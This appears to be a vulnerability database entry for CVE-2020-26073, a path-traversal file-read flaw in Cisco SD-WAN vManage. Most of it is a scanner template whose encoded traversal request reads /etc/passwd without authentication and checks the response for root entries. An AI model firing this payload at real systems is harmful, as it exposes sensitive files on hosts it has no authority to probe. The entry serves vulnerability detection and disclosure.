CVE-2020-26073: Cisco SD-WAN vManage Software - Local File Inclusion

日期: 2025-08-01 | 影响软件: Cisco SD-WAN vManage Software | POC: 已公开

漏洞描述

Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.

PoC代码[已公开]

id: CVE-2020-26073

info:
  name: Cisco SD-WAN vManage Software - Local File Inclusion
  author: madrobot
  severity: high
  description: |
    Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the affected system.
  remediation: |
    Apply the latest security patches provided by Cisco to fix the vulnerability.
  reference:
    - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
  classification:
    cve-id: CVE-2020-26073
    epss-score: 0.89723
    epss-percentile: 0.99535
  metadata:
    max-request: 1
  tags: cve,cve2020,cisco,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4a0a0047304502200632bf50aae664ca0b3e033e751031d07e2ae319f8be2ad08cf1b73b53ec7163022100c7792a47c53e8522864adeef5d6f5020b2776f4e0f054ec9035002a4b81809a4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐